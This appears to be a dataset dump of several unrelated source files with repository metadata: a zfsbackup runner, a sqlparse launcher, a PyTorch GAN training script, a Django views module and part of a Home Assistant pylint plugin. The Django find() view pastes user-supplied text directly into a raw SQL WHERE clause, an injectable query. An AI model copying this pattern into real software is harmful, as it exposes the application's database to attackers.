] | permissive | g0dsCookie/zfsbackup | 8259da3c00c680af63ce306e084d10cc2b81f92f | 0449208aa85c327c2e80ba39460efb0f481a8964 | refs/heads/master | 2020-09-15T08:47:21.127812 | 2020-03-23T09:14:32 | 2020-03-23T09:14:32 | 223,399,803 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 660 | py | from typing import List
from .base import RunnerBase
class Command(RunnerBase):
def __init__(self, name: str, cmd: str, args: List[str],
sudo: str, use_sudo: bool, readonly: bool, really: bool):
self._cmd = cmd
self._arguments = args
self._use_sudo = use_sudo
self._readonly = readonly
super().__init__(prog=self._cmd, sudo=sudo,
really=really, name=name)
def run(self):
(retcode, _) = self._run(args=self._arguments,
sudo=self._use_sudo,
readonly=self._readonly)
return retcode == 0
| [
"g0dscookie@cookieprojects.de"
] | g0dscookie@cookieprojects.de |
d9e13ebc7b7b3418a217d610d03f85b4f6e99cd0 | 49bdad22c3217d5febc9b13d8d6b5a35530b0fca | /myproject/bin/sqlformat | aecb181737208f50bd53ec1257427e72a5da1719 | [] | no_license | pingam-1/my-first-blog | 87e9758f063963ced2d891c9b717e07fbce29c58 | 8a136b0acd89d4b36b946323cf0d90040fdcd8e2 | refs/heads/master | 2022-09-29T02:44:55.966367 | 2020-06-07T19:13:14 | 2020-06-07T19:13:14 | 262,886,471 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 258 | #!/home/kubra/Belgeler/djangogirls/myproject/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from sqlparse.__main__ import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"bilgihber@gmail.com"
] | bilgihber@gmail.com | |
420f81b2c2552fd4799a23d2309c0cb150062de3 | 7abe6502f7dfdd46a7dd1a7f6ab09473d56ff171 | /train.py | fd12112b60b833e0318fdaf434e4f49e2d273aef | [] | no_license | Moveisthebest/speech-domain-adaptation-DRL | 75b9ca6545d9acbc33f3202625cfe4bc2600e624 | 9c6366da39239765e4f33954b500db40b882273d | refs/heads/master | 2021-03-12T06:53:14.377178 | 2019-05-15T02:23:07 | 2019-05-15T02:23:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,686 | py | import os
from itertools import chain
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.utils.data import DataLoader
from torch.autograd import Variable
import numpy as np
from dataloader import npyDataset2d
from model import Generator, Discriminator, ContentEncoder, StyleEncoder
from utils import Tanhize
from hparams import get_hparams
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
lambda_cy = 10
lambda_f = 1
lambda_s = 1
lambda_c = 1
def weights_init(m):
classname = m.__class__.__name__
if classname.find('Conv') != -1:
m.weight.data.normal_(0.0, 0.02)
elif classname.find('BatchNorm') != -1:
m.weight.data.normal_(1.0, 0.02)
m.bias.data.fill_(0)
def get_z_random(batch, dim1):
z = torch.randn(batch, dim1).cuda()
return z
def recon_criterion(x,y):
return torch.mean(torch.abs(x-y))
def train():
hparams = get_hparams()
model_path = os.path.join( hparams.model_path, hparams.task_name, hparams.spec_opt )
if not os.path.exists(model_path):
os.makedirs(model_path)
# Load Dataset Loader
normalizer_clean = Tanhize('clean')
normalizer_noisy = Tanhize('noisy')
print('Load dataset2d loader')
dataset_A_2d = npyDataset2d(hparams.dataset_root,hparams.list_dir_train_A_2d, hparams.frame_len, normalizer = normalizer_noisy)
dataset_B_2d = npyDataset2d(hparams.dataset_root,hparams.list_dir_train_B_2d, hparams.frame_len, normalizer = normalizer_clean)
dataloader_A = DataLoader(dataset_A_2d, batch_size = hparams.batch_size,
shuffle = True,
drop_last = True,
)
dataloader_B = DataLoader(dataset_B_2d, batch_size = hparams.batch_size,
shuffle = True,
drop_last = True,
)
# Load Generator / Disciminator model
generator_A = Generator()
generator_B = Generator()
discriminator_A = Discriminator()
discriminator_B = Discriminator()
ContEncoder_A = ContentEncoder()
ContEncoder_B = ContentEncoder()
StEncoder_A = StyleEncoder()
StEncoder_B = StyleEncoder()
generator_A.apply(weights_init)
generator_B.apply(weights_init)
discriminator_A.apply(weights_init)
discriminator_B.apply(weights_init)
ContEncoder_A.apply(weights_init)
ContEncoder_B.apply(weights_init)
StEncoder_A.apply(weights_init)
StEncoder_B.apply(weights_init)
real_label = 1
fake_label = 0
real_tensor = Variable(torch.FloatTensor(hparams.batch_size))
_ = real_tensor.data.fill_(real_label)
fake_tensor = Variable(torch.FloatTensor(hparams.batch_size))
_ = fake_tensor.data.fill_(fake_label)
# Define Loss function
d = nn.MSELoss()
bce = nn.BCELoss()
# Cuda Process
if hparams.cuda == True:
print('-- Activate with CUDA --')
generator_A = nn.DataParallel(generator_A).cuda()
generator_B = nn.DataParallel(generator_B).cuda()
discriminator_A = nn.DataParallel(discriminator_A).cuda()
discriminator_B = nn.DataParallel(discriminator_B).cuda()
ContEncoder_A = nn.DataParallel(ContEncoder_A).cuda()
ContEncoder_B = nn.DataParallel(ContEncoder_B).cuda()
StEncoder_A = nn.DataParallel(StEncoder_A).cuda()
StEncoder_B = nn.DataParallel(StEncoder_B).cuda()
d.cuda()
bce.cuda()
real_tensor = real_tensor.cuda()
fake_tensor = fake_tensor.cuda()
else:
print('-- Activate without CUDA --')
gen_params = chain(
generator_A.parameters(),
generator_B.parameters(),
ContEncoder_A.parameters(),
ContEncoder_B.parameters(),
StEncoder_A.parameters(),
StEncoder_B.parameters(),
)
dis_params = chain(
discriminator_A.parameters(),
discriminator_B.parameters(),
)
optimizer_g = optim.Adam( gen_params, lr=hparams.learning_rate)
optimizer_d = optim.Adam( dis_params, lr=hparams.learning_rate)
iters = 0
for e in range(hparams.epoch_size):
# input Tensor
A_loader, B_loader = iter(dataloader_A), iter(dataloader_B)
for i in range(len(A_loader)-1):
batch_A = A_loader.next()
batch_B = B_loader.next()
A_indx = torch.LongTensor(list( range(hparams.batch_size)))
B_indx = torch.LongTensor(list( range(hparams.batch_size)))
A_ = torch.FloatTensor(batch_A)
B_ = torch.FloatTensor(batch_B)
if hparams.cuda == True:
x_A = Variable(A_.cuda())
x_B = Variable(B_.cuda())
else:
x_A = Variable(A_)
x_B = Variable(B_)
real_tensor.data.resize_(hparams.batch_size).fill_(real_label)
fake_tensor.data.resize_(hparams.batch_size).fill_(fake_label)
## Discrominator Update Steps
discriminator_A.zero_grad()
discriminator_B.zero_grad()
# x_A, x_B, x_AB, x_BA
# [#_batch, max_time_len, dim]
A_c = ContEncoder_A(x_A).detach()
B_c = ContEncoder_B(x_B).detach()
# A,B : N ~ (0,1)
A_s = Variable(get_z_random(hparams.batch_size, 8))
B_s = Variable(get_z_random(hparams.batch_size, 8))
x_AB = generator_B(A_c, B_s).detach()
x_BA = generator_A(B_c, A_s).detach()
# We recommend LSGAN-loss for adversarial loss
l_d_A_real = 0.5 * torch.mean( (discriminator_A(x_A) - real_tensor) **2 )
l_d_A_fake = 0.5 * torch.mean( (discriminator_A(x_BA) - fake_tensor) **2 )
l_d_B_real = 0.5 * torch.mean( (discriminator_B(x_B) - real_tensor)** 2)
l_d_B_fake = 0.5 * torch.mean( (discriminator_B(x_AB) - fake_tensor) ** 2)
l_d_A = l_d_A_real + l_d_A_fake
l_d_B = l_d_B_real + l_d_B_fake
l_d = l_d_A + l_d_B
l_d.backward()
optimizer_d.step()
## Generator Update Steps
generator_A.zero_grad()
generator_B.zero_grad()
ContEncoder_A.zero_grad()
ContEncoder_B.zero_grad()
StEncoder_A.zero_grad()
StEncoder_B.zero_grad()
A_c = ContEncoder_A(x_A)
B_c = ContEncoder_B(x_B)
A_s_prime = StEncoder_A(x_A)
B_s_prime = StEncoder_B(x_B)
# A,B : N ~ (0,1)
A_s = Variable(get_z_random(hparams.batch_size, 8))
B_s = Variable(get_z_random(hparams.batch_size, 8))
x_BA = generator_A(B_c, A_s)
x_AB = generator_B(A_c, B_s)
x_A_recon = generator_A(A_c, A_s_prime)
x_B_recon = generator_B(B_c, B_s_prime)
B_c_recon = ContEncoder_A(x_BA)
A_s_recon = StEncoder_A(x_BA)
A_c_recon = ContEncoder_B(x_AB)
B_s_recon = StEncoder_B(x_AB)
x_ABA = generator_A(A_c_recon, A_s_prime)
x_BAB = generator_B(B_c_recon, B_s_prime)
l_cy_A = recon_criterion(x_ABA, x_A)
l_cy_B = recon_criterion(x_BAB, x_B)
l_f_A = recon_criterion(x_A_recon, x_A)
l_f_B = recon_criterion(x_B_recon, x_B)
l_c_A = recon_criterion(A_c_recon, A_c)
l_c_B = recon_criterion(B_c_recon, B_c)
l_s_A = recon_criterion(A_s_recon, A_s)
l_s_B = recon_criterion(B_s_recon, B_s)
# We recommend LSGAN-loss for adversarial loss
l_gan_A = 0.5 * torch.mean( (discriminator_A(x_BA) - real_tensor) **2)
l_gan_B = 0.5 * torch.mean( (discriminator_B(x_AB) - real_tensor ) **2)
l_g = l_gan_A + l_gan_B + lambda_f *( l_f_A + l_f_B) + lambda_s * (l_s_A + l_s_B) + lambda_c * (l_c_A + l_c_B) + lambda_cy * ( l_cy_A + l_cy_B)
l_g.backward()
optimizer_g.step()
if iters % hparams.log_interval == 0:
print ("---------------------")
print ("Gen Loss :{} disc loss :{}".format(l_g/hparams.batch_size , l_d/hparams.batch_size))
print ("epoch :" , e , " " , "total ", hparams.epoch_size)
print ("iteration :", iters )
if iters % hparams.model_save_interval == 0:
torch.save( generator_A.state_dict(), os.path.join(model_path, 'model_gen_A_{}.pth'.format(iters)))
torch.save( generator_B.state_dict(), os.path.join(model_path, 'model_gen_B_{}.pth'.format(iters)))
torch.save( discriminator_A.state_dict(), os.path.join(model_path, 'model_dis_A_{}.pth'.format(iters)))
torch.save( discriminator_B.state_dict(), os.path.join(model_path, 'model_dis_B_{}.pth'.format(iters)))
torch.save( ContEncoder_A.state_dict(), os.path.join(model_path, 'model_ContEnc_A_{}.pth'.format(iters)))
torch.save( ContEncoder_B.state_dict(), os.path.join(model_path, 'model_ContEnc_B_{}.pth'.format(iters)))
torch.save( StEncoder_A.state_dict(), os.path.join(model_path, 'model_StEnc_A_{}.pth'.format(iters)))
torch.save( StEncoder_B.state_dict(), os.path.join(model_path, 'model_StEnc_B_{}.pth'.format(iters)))
iters += 1
if __name__ == '__main__':
train()
| [
"pjh2176@gmail.com"
] | pjh2176@gmail.com |
db8a93e0e6d424d73864946b6ab40104db99a020 | 7df03e95ee65072b49520c00509445d6b059bcea | /hello/views.py | a054b8beb1b327c7f7df3e7106a13f3e7da3c785 | [] | no_license | yunsunghyun/django_app | 85015fbaf48dff6acf2346d32aef70575af4ad07 | f742f8347408e90e1f6559d9c0e8fe0213f86fe2 | refs/heads/master | 2020-05-07T14:45:38.305417 | 2019-05-26T10:27:00 | 2019-05-26T10:27:00 | 180,607,867 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,007 | py | from django.core.paginator import Paginator
from django.db.models import Q, Count, Sum, Avg, Min, Max
from django.shortcuts import render, redirect
from hello.forms import MessageForm
from hello.models import Message
from .models import Friend
from .forms import FriendForm, FindForm, CheckForm
def index(request, num=1):
data = Friend.objects.all()
page = Paginator(data, 2)
params = {
'title': 'Hello',
'message': '',
'data': page.get_page(num),
}
return render(request, 'hello/index.html', params)
# create model
def create(request):
if request.method == 'POST':
obj = Friend()
friend = FriendForm(request.POST, instance=obj)
friend.save()
return redirect(to='/hello')
params = {
'title': 'Hello',
'form': FriendForm(),
}
return render(request, 'hello/create.html', params)
def edit(request, num):
obj = Friend.objects.get(id=num)
if request.method == 'POST':
friend = FriendForm(request.POST, instance=obj)
friend.save()
return redirect(to='/hello')
params = {
'title': 'Hello',
'id': num,
'form': FriendForm(instance=obj)
}
return render(request, 'hello/edit.html', params)
def delete(request, num):
friend = Friend.objects.get(id=num)
if request.method == 'POST':
friend.delete()
return redirect(to='/hello')
params = {
'title': 'Hello',
'id': num,
'obj': friend,
}
return render(request, 'hello/delete.html', params)
def find(request):
if request.method == 'POST':
msg = request.POST['find']
form = FindForm(request.POST)
sql = 'select * from hello_friend'
if msg != '':
sql += ' where ' + msg
data = Friend.objects.raw(sql)
msg = sql
else:
msg = 'search words...'
form = FindForm()
data = Friend.objects.all()
params = {
'title': 'Hello',
'message': msg,
'form': form,
'data': data,
}
return render(request, 'hello/find.html', params)
def check(request):
params = {
'title': 'Hello',
'message': 'check validation. ',
'form': CheckForm(),
}
if request.method == 'POST':
obj = Friend()
form = FriendForm(request.POST, instance=obj)
params['form'] = form
if form.is_valid():
params['message'] = 'OK!'
else:
params['message'] = 'no good.'
return render(request, 'hello/check.html', params)
def message(request, page=1):
if request.method == 'POST':
obj = Message()
form = MessageForm(request.POST, instance=obj)
form.save()
data = Message.objects.all().reverse()
paginator = Paginator(data, 5)
params = {
'title': 'Messagee',
'form': MessageForm(),
'data': paginator.get_page(page),
}
return render(request, 'hello/message.html', params)
| [
"ysh151@naver.com"
] | ysh151@naver.com |
0820a6cc602ef2fd357b40e1e1a7c23ad21f9e2a | 728227574c3bcf209bbf3ebc9ccc0ffb549b80d4 | /pylint/plugins/hass_enforce_type_hints.py | 9ec2fa838065201512aa57d0a0bd488d20c0efc3 | [
"Apache-2.0"
] | permissive | jrester/home-assistant | e016e8d4b2843792dcb3a9e85b3060db204034a8 | eb6afd27b312ed2910a1ad32aa20a3f4ebd54cf8 | refs/heads/dev | 2023-03-04T23:02:52.667683 | 2022-06-25T10:34:30 | 2022-06-25T10:34:30 | 200,057,420 | 0 | 0 | Apache-2.0 | 2023-02-22T06:14:56 | 2019-08-01T13:37:48 | Python | UTF-8 | Python | false | false | 28,504 | py | """Plugin to enforce type hints on specific functions."""
from __future__ import annotations
from dataclasses import dataclass
import re
from astroid import nodes
from pylint.checkers import BaseChecker
from pylint.lint import PyLinter
from homeassistant.const import Platform
UNDEFINED = object()
_PLATFORMS: set[str] = {platform.value for platform in Platform}
@dataclass
class TypeHintMatch:
"""Class for pattern matching."""
function_name: str
return_type: list[str] | str | None | object
arg_types: dict[int, str] | None = None
"""arg_types is for positional arguments"""
named_arg_types: dict[str, str] | None = None
"""named_arg_types is for named or keyword arguments"""
kwargs_type: str | None = None
"""kwargs_type is for the special case `**kwargs`"""
check_return_type_inheritance: bool = False
has_async_counterpart: bool = False
def need_to_check_function(self, node: nodes.FunctionDef) -> bool:
"""Confirm if function should be checked."""
return (
self.function_name == node.name
or self.has_async_counterpart
and node.name == f"async_{self.function_name}"
)
@dataclass
class ClassTypeHintMatch:
"""Class for pattern matching."""
base_class: str
matches: list[TypeHintMatch]
_TYPE_HINT_MATCHERS: dict[str, re.Pattern[str]] = {
# a_or_b matches items such as "DiscoveryInfoType | None"
"a_or_b": re.compile(r"^(\w+) \| (\w+)$"),
# x_of_y matches items such as "Awaitable[None]"
"x_of_y": re.compile(r"^(\w+)\[(.*?]*)\]$"),
# x_of_y_comma_z matches items such as "Callable[..., Awaitable[None]]"
"x_of_y_comma_z": re.compile(r"^(\w+)\[(.*?]*), (.*?]*)\]$"),
# x_of_y_of_z_comma_a matches items such as "list[dict[str, Any]]"
"x_of_y_of_z_comma_a": re.compile(r"^(\w+)\[(\w+)\[(.*?]*), (.*?]*)\]\]$"),
}
_MODULE_REGEX: re.Pattern[str] = re.compile(r"^homeassistant\.components\.\w+(\.\w+)?$")
_FUNCTION_MATCH: dict[str, list[TypeHintMatch]] = {
"__init__": [
TypeHintMatch(
function_name="setup",
arg_types={
0: "HomeAssistant",
1: "ConfigType",
},
return_type="bool",
has_async_counterpart=True,
),
TypeHintMatch(
function_name="async_setup_entry",
arg_types={
0: "HomeAssistant",
1: "ConfigEntry",
},
return_type="bool",
),
TypeHintMatch(
function_name="async_remove_entry",
arg_types={
0: "HomeAssistant",
1: "ConfigEntry",
},
return_type=None,
),
TypeHintMatch(
function_name="async_unload_entry",
arg_types={
0: "HomeAssistant",
1: "ConfigEntry",
},
return_type="bool",
),
TypeHintMatch(
function_name="async_migrate_entry",
arg_types={
0: "HomeAssistant",
1: "ConfigEntry",
},
return_type="bool",
),
TypeHintMatch(
function_name="async_remove_config_entry_device",
arg_types={
0: "HomeAssistant",
1: "ConfigEntry",
2: "DeviceEntry",
},
return_type="bool",
),
],
"__any_platform__": [
TypeHintMatch(
function_name="setup_platform",
arg_types={
0: "HomeAssistant",
1: "ConfigType",
2: "AddEntitiesCallback",
3: "DiscoveryInfoType | None",
},
return_type=None,
has_async_counterpart=True,
),
TypeHintMatch(
function_name="async_setup_entry",
arg_types={
0: "HomeAssistant",
1: "ConfigEntry",
2: "AddEntitiesCallback",
},
return_type=None,
),
],
"application_credentials": [
TypeHintMatch(
function_name="async_get_auth_implementation",
arg_types={
0: "HomeAssistant",
1: "str",
2: "ClientCredential",
},
return_type="AbstractOAuth2Implementation",
),
TypeHintMatch(
function_name="async_get_authorization_server",
arg_types={
0: "HomeAssistant",
},
return_type="AuthorizationServer",
),
],
"backup": [
TypeHintMatch(
function_name="async_pre_backup",
arg_types={
0: "HomeAssistant",
},
return_type=None,
),
TypeHintMatch(
function_name="async_post_backup",
arg_types={
0: "HomeAssistant",
},
return_type=None,
),
],
"cast": [
TypeHintMatch(
function_name="async_get_media_browser_root_object",
arg_types={
0: "HomeAssistant",
1: "str",
},
return_type="list[BrowseMedia]",
),
TypeHintMatch(
function_name="async_browse_media",
arg_types={
0: "HomeAssistant",
1: "str",
2: "str",
3: "str",
},
return_type=["BrowseMedia", "BrowseMedia | None"],
),
TypeHintMatch(
function_name="async_play_media",
arg_types={
0: "HomeAssistant",
1: "str",
2: "Chromecast",
3: "str",
4: "str",
},
return_type="bool",
),
],
"config_flow": [
TypeHintMatch(
function_name="_async_has_devices",
arg_types={
0: "HomeAssistant",
},
return_type="bool",
),
],
"device_action": [
TypeHintMatch(
function_name="async_validate_action_config",
arg_types={
0: "HomeAssistant",
1: "ConfigType",
},
return_type="ConfigType",
),
TypeHintMatch(
function_name="async_call_action_from_config",
arg_types={
0: "HomeAssistant",
1: "ConfigType",
2: "TemplateVarsType",
3: "Context | None",
},
return_type=None,
),
TypeHintMatch(
function_name="async_get_action_capabilities",
arg_types={
0: "HomeAssistant",
1: "ConfigType",
},
return_type="dict[str, Schema]",
),
TypeHintMatch(
function_name="async_get_actions",
arg_types={
0: "HomeAssistant",
1: "str",
},
return_type=["list[dict[str, str]]", "list[dict[str, Any]]"],
),
],
"device_condition": [
TypeHintMatch(
function_name="async_validate_condition_config",
arg_types={
0: "HomeAssistant",
1: "ConfigType",
},
return_type="ConfigType",
),
TypeHintMatch(
function_name="async_condition_from_config",
arg_types={
0: "HomeAssistant",
1: "ConfigType",
},
return_type="ConditionCheckerType",
),
TypeHintMatch(
function_name="async_get_condition_capabilities",
arg_types={
0: "HomeAssistant",
1: "ConfigType",
},
return_type="dict[str, Schema]",
),
TypeHintMatch(
function_name="async_get_conditions",
arg_types={
0: "HomeAssistant",
1: "str",
},
return_type=["list[dict[str, str]]", "list[dict[str, Any]]"],
),
],
"device_tracker": [
TypeHintMatch(
function_name="setup_scanner",
arg_types={
0: "HomeAssistant",
1: "ConfigType",
2: "Callable[..., None]",
3: "DiscoveryInfoType | None",
},
return_type="bool",
),
TypeHintMatch(
function_name="async_setup_scanner",
arg_types={
0: "HomeAssistant",
1: "ConfigType",
2: "Callable[..., Awaitable[None]]",
3: "DiscoveryInfoType | None",
},
return_type="bool",
),
TypeHintMatch(
function_name="get_scanner",
arg_types={
0: "HomeAssistant",
1: "ConfigType",
},
return_type=["DeviceScanner", "DeviceScanner | None"],
has_async_counterpart=True,
),
],
"device_trigger": [
TypeHintMatch(
function_name="async_validate_condition_config",
arg_types={
0: "HomeAssistant",
1: "ConfigType",
},
return_type="ConfigType",
),
TypeHintMatch(
function_name="async_attach_trigger",
arg_types={
0: "HomeAssistant",
1: "ConfigType",
2: "AutomationActionType",
3: "AutomationTriggerInfo",
},
return_type="CALLBACK_TYPE",
),
TypeHintMatch(
function_name="async_get_trigger_capabilities",
arg_types={
0: "HomeAssistant",
1: "ConfigType",
},
return_type="dict[str, Schema]",
),
TypeHintMatch(
function_name="async_get_triggers",
arg_types={
0: "HomeAssistant",
1: "str",
},
return_type=["list[dict[str, str]]", "list[dict[str, Any]]"],
),
],
"diagnostics": [
TypeHintMatch(
function_name="async_get_config_entry_diagnostics",
arg_types={
0: "HomeAssistant",
1: "ConfigEntry",
},
return_type=UNDEFINED,
),
TypeHintMatch(
function_name="async_get_device_diagnostics",
arg_types={
0: "HomeAssistant",
1: "ConfigEntry",
2: "DeviceEntry",
},
return_type=UNDEFINED,
),
],
}
_CLASS_MATCH: dict[str, list[ClassTypeHintMatch]] = {
"config_flow": [
ClassTypeHintMatch(
base_class="ConfigFlow",
matches=[
TypeHintMatch(
function_name="async_get_options_flow",
arg_types={
0: "ConfigEntry",
},
return_type="OptionsFlow",
check_return_type_inheritance=True,
),
TypeHintMatch(
function_name="async_step_dhcp",
arg_types={
1: "DhcpServiceInfo",
},
return_type="FlowResult",
),
TypeHintMatch(
function_name="async_step_hassio",
arg_types={
1: "HassioServiceInfo",
},
return_type="FlowResult",
),
TypeHintMatch(
function_name="async_step_homekit",
arg_types={
1: "ZeroconfServiceInfo",
},
return_type="FlowResult",
),
TypeHintMatch(
function_name="async_step_mqtt",
arg_types={
1: "MqttServiceInfo",
},
return_type="FlowResult",
),
TypeHintMatch(
function_name="async_step_ssdp",
arg_types={
1: "SsdpServiceInfo",
},
return_type="FlowResult",
),
TypeHintMatch(
function_name="async_step_usb",
arg_types={
1: "UsbServiceInfo",
},
return_type="FlowResult",
),
TypeHintMatch(
function_name="async_step_zeroconf",
arg_types={
1: "ZeroconfServiceInfo",
},
return_type="FlowResult",
),
],
),
],
}
# Overriding properties and functions are normally checked by mypy, and will only
# be checked by pylint when --ignore-missing-annotations is False
_TOGGLE_ENTITY_MATCH: list[TypeHintMatch] = [
TypeHintMatch(
function_name="is_on",
return_type=["bool", None],
),
TypeHintMatch(
function_name="turn_on",
kwargs_type="Any",
return_type=None,
has_async_counterpart=True,
),
TypeHintMatch(
function_name="turn_off",
kwargs_type="Any",
return_type=None,
has_async_counterpart=True,
),
TypeHintMatch(
function_name="toggle",
kwargs_type="Any",
return_type=None,
has_async_counterpart=True,
),
]
_INHERITANCE_MATCH: dict[str, list[ClassTypeHintMatch]] = {
"fan": [
ClassTypeHintMatch(
base_class="ToggleEntity",
matches=_TOGGLE_ENTITY_MATCH,
),
ClassTypeHintMatch(
base_class="FanEntity",
matches=[
TypeHintMatch(
function_name="percentage",
return_type=["int", None],
),
TypeHintMatch(
function_name="speed_count",
return_type="int",
),
TypeHintMatch(
function_name="percentage_step",
return_type="float",
),
TypeHintMatch(
function_name="current_direction",
return_type=["str", None],
),
TypeHintMatch(
function_name="oscillating",
return_type=["bool", None],
),
TypeHintMatch(
function_name="capability_attributes",
return_type="dict[str]",
),
TypeHintMatch(
function_name="supported_features",
return_type="int",
),
TypeHintMatch(
function_name="preset_mode",
return_type=["str", None],
),
TypeHintMatch(
function_name="preset_modes",
return_type=["list[str]", None],
),
TypeHintMatch(
function_name="set_percentage",
arg_types={1: "int"},
return_type=None,
has_async_counterpart=True,
),
TypeHintMatch(
function_name="set_preset_mode",
arg_types={1: "str"},
return_type=None,
has_async_counterpart=True,
),
TypeHintMatch(
function_name="set_direction",
arg_types={1: "str"},
return_type=None,
has_async_counterpart=True,
),
TypeHintMatch(
function_name="turn_on",
named_arg_types={
"percentage": "int | None",
"preset_mode": "str | None",
},
kwargs_type="Any",
return_type=None,
has_async_counterpart=True,
),
TypeHintMatch(
function_name="oscillate",
arg_types={1: "bool"},
return_type=None,
has_async_counterpart=True,
),
],
),
],
"lock": [
ClassTypeHintMatch(
base_class="LockEntity",
matches=[
TypeHintMatch(
function_name="changed_by",
return_type=["str", None],
),
TypeHintMatch(
function_name="code_format",
return_type=["str", None],
),
TypeHintMatch(
function_name="is_locked",
return_type=["bool", None],
),
TypeHintMatch(
function_name="is_locking",
return_type=["bool", None],
),
TypeHintMatch(
function_name="is_unlocking",
return_type=["bool", None],
),
TypeHintMatch(
function_name="is_jammed",
return_type=["bool", None],
),
TypeHintMatch(
function_name="lock",
kwargs_type="Any",
return_type=None,
has_async_counterpart=True,
),
TypeHintMatch(
function_name="unlock",
kwargs_type="Any",
return_type=None,
has_async_counterpart=True,
),
TypeHintMatch(
function_name="open",
kwargs_type="Any",
return_type=None,
has_async_counterpart=True,
),
],
),
],
}
def _is_valid_type(
expected_type: list[str] | str | None | object, node: nodes.NodeNG
) -> bool:
"""Check the argument node against the expected type."""
if expected_type is UNDEFINED:
return True
if isinstance(expected_type, list):
for expected_type_item in expected_type:
if _is_valid_type(expected_type_item, node):
return True
return False
# Const occurs when the type is None
if expected_type is None or expected_type == "None":
return isinstance(node, nodes.Const) and node.value is None
assert isinstance(expected_type, str)
# Const occurs when the type is an Ellipsis
if expected_type == "...":
return isinstance(node, nodes.Const) and node.value == Ellipsis
# Special case for `xxx | yyy`
if match := _TYPE_HINT_MATCHERS["a_or_b"].match(expected_type):
return (
isinstance(node, nodes.BinOp)
and _is_valid_type(match.group(1), node.left)
and _is_valid_type(match.group(2), node.right)
)
# Special case for xxx[yyy[zzz, aaa]]`
if match := _TYPE_HINT_MATCHERS["x_of_y_of_z_comma_a"].match(expected_type):
return (
isinstance(node, nodes.Subscript)
and _is_valid_type(match.group(1), node.value)
and isinstance(subnode := node.slice, nodes.Subscript)
and _is_valid_type(match.group(2), subnode.value)
and isinstance(subnode.slice, nodes.Tuple)
and _is_valid_type(match.group(3), subnode.slice.elts[0])
and _is_valid_type(match.group(4), subnode.slice.elts[1])
)
# Special case for xxx[yyy, zzz]`
if match := _TYPE_HINT_MATCHERS["x_of_y_comma_z"].match(expected_type):
return (
isinstance(node, nodes.Subscript)
and _is_valid_type(match.group(1), node.value)
and isinstance(node.slice, nodes.Tuple)
and _is_valid_type(match.group(2), node.slice.elts[0])
and _is_valid_type(match.group(3), node.slice.elts[1])
)
# Special case for xxx[yyy]`
if match := _TYPE_HINT_MATCHERS["x_of_y"].match(expected_type):
return (
isinstance(node, nodes.Subscript)
and _is_valid_type(match.group(1), node.value)
and _is_valid_type(match.group(2), node.slice)
)
# Name occurs when a namespace is not used, eg. "HomeAssistant"
if isinstance(node, nodes.Name) and node.name == expected_type:
return True
# Attribute occurs when a namespace is used, eg. "core.HomeAssistant"
return isinstance(node, nodes.Attribute) and node.attrname == expected_type
def _is_valid_return_type(match: TypeHintMatch, node: nodes.NodeNG) -> bool:
if _is_valid_type(match.return_type, node):
return True
if isinstance(node, nodes.BinOp):
return _is_valid_return_type(match, node.left) and _is_valid_return_type(
match, node.right
)
if (
match.check_return_type_inheritance
and isinstance(match.return_type, str)
and isinstance(node, nodes.Name)
):
ancestor: nodes.ClassDef
for infer_node in node.infer():
if isinstance(infer_node, nodes.ClassDef):
if infer_node.name == match.return_type:
return True
for ancestor in infer_node.ancestors():
if ancestor.name == match.return_type:
return True
return False
def _get_all_annotations(node: nodes.FunctionDef) -> list[nodes.NodeNG | None]:
args = node.args
annotations: list[nodes.NodeNG | None] = (
args.posonlyargs_annotations + args.annotations + args.kwonlyargs_annotations
)
if args.vararg is not None:
annotations.append(args.varargannotation)
if args.kwarg is not None:
annotations.append(args.kwargannotation)
return annotations
def _get_named_annotation(
node: nodes.FunctionDef, key: str
) -> tuple[nodes.NodeNG, nodes.NodeNG] | tuple[None, None]:
args = node.args
for index, arg_node in enumerate(args.args):
if key == arg_node.name:
return arg_node, args.annotations[index]
for index, arg_node in enumerate(args.kwonlyargs):
if key == arg_node.name:
return arg_node, args.kwonlyargs_annotations[index]
return None, None
def _has_valid_annotations(
annotations: list[nodes.NodeNG | None],
) -> bool:
for annotation in annotations:
if annotation is not None:
return True
return False
def _get_module_platform(module_name: str) -> str | None:
"""Called when a Module node is visited."""
if not (module_match := _MODULE_REGEX.match(module_name)):
# Ensure `homeassistant.components.<component>`
# Or `homeassistant.components.<component>.<platform>`
return None
platform = module_match.groups()[0]
return platform.lstrip(".") if platform else "__init__"
class HassTypeHintChecker(BaseChecker): # type: ignore[misc]
"""Checker for setup type hints."""
name = "hass_enforce_type_hints"
priority = -1
msgs = {
"W7431": (
"Argument %s should be of type %s",
"hass-argument-type",
"Used when method argument type is incorrect",
),
"W7432": (
"Return type should be %s",
"hass-return-type",
"Used when method return type is incorrect",
),
}
options = (
(
"ignore-missing-annotations",
{
"default": True,
"type": "yn",
"metavar": "<y or n>",
"help": "Set to ``no`` if you wish to check functions that do not "
"have any type hints.",
},
),
)
def __init__(self, linter: PyLinter | None = None) -> None:
super().__init__(linter)
self._function_matchers: list[TypeHintMatch] = []
self._class_matchers: list[ClassTypeHintMatch] = []
def visit_module(self, node: nodes.Module) -> None:
"""Called when a Module node is visited."""
self._function_matchers = []
self._class_matchers = []
if (module_platform := _get_module_platform(node.name)) is None:
return
if module_platform in _PLATFORMS:
self._function_matchers.extend(_FUNCTION_MATCH["__any_platform__"])
if function_matches := _FUNCTION_MATCH.get(module_platform):
self._function_matchers.extend(function_matches)
if class_matches := _CLASS_MATCH.get(module_platform):
self._class_matchers.extend(class_matches)
if not self.linter.config.ignore_missing_annotations and (
property_matches := _INHERITANCE_MATCH.get(module_platform)
):
self._class_matchers.extend(property_matches)
def visit_classdef(self, node: nodes.ClassDef) -> None:
"""Called when a ClassDef node is visited."""
ancestor: nodes.ClassDef
for ancestor in node.ancestors():
for class_matches in self._class_matchers:
if ancestor.name == class_matches.base_class:
self._visit_class_functions(node, class_matches.matches)
def _visit_class_functions(
self, node: nodes.ClassDef, matches: list[TypeHintMatch]
) -> None:
for match in matches:
for function_node in node.mymethods():
if match.need_to_check_function(function_node):
self._check_function(function_node, match)
